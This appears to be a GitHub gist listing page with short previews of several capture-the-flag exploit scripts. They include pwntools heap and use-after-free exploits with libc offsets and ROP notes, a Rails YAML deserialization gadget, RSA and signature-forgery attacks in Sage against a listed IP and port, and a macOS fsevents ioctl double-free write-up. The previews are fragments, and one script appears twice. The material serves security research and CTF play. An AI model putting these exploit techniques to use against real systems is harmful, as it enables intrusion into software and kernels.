View gist:b5280bc856bfc94157b760eb962e7b60
#!/usr/bin/env python | |
#-*- coding: utf-8 -*- | |
from pwn import * | |
import re | |
import sys | |
import string | |
import itertools | |
# UAF in IndexCursor |
View railspwn.rb
require 'yaml' | |
require 'base64' | |
require 'erb' | |
class ActiveSupport | |
class Deprecation | |
def initialize() | |
@silenced = true | |
end | |
class DeprecatedInstanceVariableProxy |
View gracias.py
from sage.all import continued_fraction, Integer, inverse_mod | |
pubkey = (1696852658826990842058316561963467335977986730245296081842693913454799128341723605666024757923000936875008280288574503060506225324560725525210728761064310034604441130912702077320696660565727540525259413564999213382434231194132697630244074950529107794905761549606578049632101483460345878198682237227139704889943489709170676301481918176902970896183163611197618458670928730764124354693594769219086662173889094843054787693685403229558143793832013288487194871165461567L, 814161885590044357190593282132583612817366020133424034468187008267919006610450334193936389251944312061685926620628676079561886595567219325737685515818965422518820810326234612624290774570873983198113409686391355443155606621049101005048872030700143084978689888823664771959905075795440800042648923901406744546140059930315752131296763893979780940230041254506456283030727953969468933552050776243515721233426119581636614777596169466339421956338478341355508343072697451L, 17101222758731850777 |
View handicraft.py
from sage.all import * | |
import base64 | |
def factor(n,b): | |
M=1 | |
print 'start' | |
a = 2 | |
i=0 | |
for q in primes(b): | |
i+=1 |
View gracias.py
from sage.all import continued_fraction, Integer, inverse_mod | |
pubkey = (1696852658826990842058316561963467335977986730245296081842693913454799128341723605666024757923000936875008280288574503060506225324560725525210728761064310034604441130912702077320696660565727540525259413564999213382434231194132697630244074950529107794905761549606578049632101483460345878198682237227139704889943489709170676301481918176902970896183163611197618458670928730764124354693594769219086662173889094843054787693685403229558143793832013288487194871165461567L, 814161885590044357190593282132583612817366020133424034468187008267919006610450334193936389251944312061685926620628676079561886595567219325737685515818965422518820810326234612624290774570873983198113409686391355443155606621049101005048872030700143084978689888823664771959905075795440800042648923901406744546140059930315752131296763893979780940230041254506456283030727953969468933552050776243515721233426119581636614777596169466339421956338478341355508343072697451L, 17101222758731850777 |
View ctfzone_pwn.py
# First stage: unsafe unlink | |
# Second stage (via a tunnel through a ROP chain): fastbin free pointer corruption | |
from pwn import * | |
import struct | |
import sys | |
offset_close = 0x00000000000f78b0 | |
offset_env = 0x3c6f38 |
View sigserver.py
# Implementation based on attack from | |
# http://www.hpl.hp.com/techreports/1999/HPL-1999-90.pdf | |
import socket | |
import telnetlib | |
import random | |
from hashlib import sha1 | |
from sage.all import inverse_mod, matrix, vector | |
TARGET = ('185.143.173.36', 1337) | |
sock=socket.create_connection(TARGET) |
View gist:416b333cb973812b39c085a42f5c19c4
The `FSEVENTS_DEVICE_FILTER_64` command for the fsevents device's `ioctl` method has a race condition bug which can lead to double `free` when the user decides to update the number of devices to 0. | |
static int | |
fseventsf_ioctl(struct fileproc *fp, u_long cmd, caddr_t data, vfs_context_t ctx) | |
{ | |
fsevent_handle *fseh = (struct fsevent_handle *)fp->f_fglob->fg_data; | |
int ret = 0; | |
fsevent_dev_filter_args64 *devfilt_args, _devfilt_args; | |
OSAddAtomic(1, &fseh->active); |
View robot_pwnage.py
import time | |
# https://github.com/niklasb/ctf-tools/blob/master/pwnlib/tools.py | |
from pwnlib.tools import * | |
TARGET=('localhost',5000) | |
INTERVAL=0 | |
offset_free = 549184 | |
offset_system = 0x456d0 |
View baby.py
import socket | |
import telnetlib | |
import time | |
import struct | |
import sys | |
TARGET=('localhost', 1337) | |
offset___libc_start_main_ret = 0x203f1 | |
offset_system = 0x00000000000456d0 |
NewerOlder